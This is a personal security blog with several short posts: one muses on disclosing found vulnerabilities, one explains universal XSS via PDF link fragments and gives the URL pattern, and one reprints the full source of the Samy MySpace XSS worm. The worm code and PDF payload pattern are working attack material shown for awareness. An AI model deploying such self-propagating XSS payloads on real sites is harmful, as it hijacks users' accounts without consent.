Shimon Krokhmal's blog

Ok, I'm facing a dilemma here.
Many of the site checks I've done returned positive results for security holes.
Now, the question is: what do I do next with this info?

The obvious options are:
•    Not to do anything with this info.
•    Write a full technical report regarding the security hole that found around the web (maybe a video demo?).
•    Open some security site that holds data about security Vulnerabilities
•    Provide some demo's of the hack.
•    Report to the site about the problem they have.
•    Try to make money of it? (This option more suited for a black hat hacker...)
•    Obtain the reputation of a Web security expert by exposing the security holes?
I remind you that there can be consequences for the actions that made (jail is not the favorite option...)

what do you think I should do?
Please comment here...
 
your opinion is very important to me.

if you have'nt been in such event, and you match the criteria (an israeli blogger...)
i have'nt been  on one of those, but judging by the last event comments (the previews dinner) - this event is something you wanna be there.

check out the post of the organizer :http://blogs.microsoft.co.il/blogs/omer/archive/2007/02/13/8020.aspx

A new blog surfaced in the last few days.
this one is from Doron Yaacoby.

this dude knows what he's talking about.
i would strongly recommend to pay this guy a visit

Sounds controversial, right ?
well, it is.

actually, on certain conditions, you can execute a javascript on the clients machine using PDF file.
the funny part is that it does not needed to be modified at all.

simply by creating a link at this pattern :

http://yoursite.com/file.pdf#whatever_name_you_want=javascript:your_code_here

there is XSS writen all over the place.
the sad part is that the site owners have nothing to do to prevent it.
this works with :

Firefox 2.0.0.1 win32
Firefox 1.5.0.8 win32
Opera 8.5.4 build 770 win32
Opera 9.10.8679 win32
and i'm sure that with other browsers too.

the subject brought to adobe's attention
http://www.adobe.com/support/security/advisories/apsa07-01.html
Adobe categorizes this as a critical issue and recommends affected users update any affected software.
http://www.adobe.com/support/security/bulletins/apsb07-01.html

how does this work ?(and why ???)

the PDF document gets parameters, the odd thing is that the value of those parameters can be retrieved via javascript.

more info could be found on those sites :
http://ha.ckers.org/blog/20070103/universal-xss-in-pdfs/
http://www.gnucitizen.org/blog/danger-danger-danger/

be carefull when you opening a PDF file next time

OK, maybe this is not some thing new, but it definitely not something common.

if you have'nt read my post on XSS prevention, please do so.

the story begins back in 10/04/05, when samy decided to get popular on mySpace.
he exploited the fact that MySpace allowed the user to enter some javascript to the personal page.

so the dude explored the mySpace system  and crafted a script that adds himself to the viewer's friend list.
technically, this is not a worm, but the replication of the code to each viewer's page qualify it as a worm.

here is the code of the worm :

<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>

 

the explain  of the code can be found here .
this shows several things :

• XSS can be exploited for major attacks, even for personal gains.
• XSS can be underestimated

please don't underastimate it.
this could do some major damage to your application

to prove my point i will include a demo on the next security post(session hijacking prevention)

today i was hoping to finish my "Session hijacking prevention" presentation,
so, i thought that recording a live demo would be nice.

And then(by mistake....) i discovered that document.cookie will give you an empty string on the internet Explorer 7.
nevertheless it works fine on previous versions of explorer and firefox .

did microsoft restricted the access to cookies vie javascript in IE7 ?